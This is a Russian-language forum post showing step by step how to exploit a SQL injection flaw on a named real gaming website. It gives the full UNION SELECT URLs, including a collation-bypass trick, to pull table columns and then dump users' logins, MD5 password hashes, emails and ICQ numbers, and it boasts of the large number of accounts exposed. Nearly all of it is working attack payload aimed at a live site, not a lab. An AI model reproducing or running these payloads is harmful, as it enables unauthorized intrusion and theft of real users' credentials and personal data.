Опять времени много =)
Цель - www.gamesplay.ru
Заходим по первой попавшейся ссылке. Видно, что движок самописный... Сразу же начинаем пихать левые параметры...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 21-1
Название игры не меняется, так как за вывод названия отвечает другая переменная. Меняется само описание, так что все ок!
Подбираем стотлбцы и зануляем запрос.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20+order+by+5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20+union+select+1,2,3,4,5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,3,4,5
Теперь пробуем вывести чуток данных из таблицы.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,user(),4,5
Облом, други! Но мы то с вами не так себе, прорвемся!
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(use r(),0x55),0x55),4,5
Теперь все ок. Ну а дальше...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(col umn_name,0x55),0x55),4,5+from+information_schema.c olumns+where+table_name='users'
Итак, финал!
login : md5(pass) : mail : icq
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(con cat(user_login,char(58),user_pass,char(58),user_ma il,char(58),user_icq),0x55),0x55),4,5+from+users
PS Пользователей не считал, но очень много =)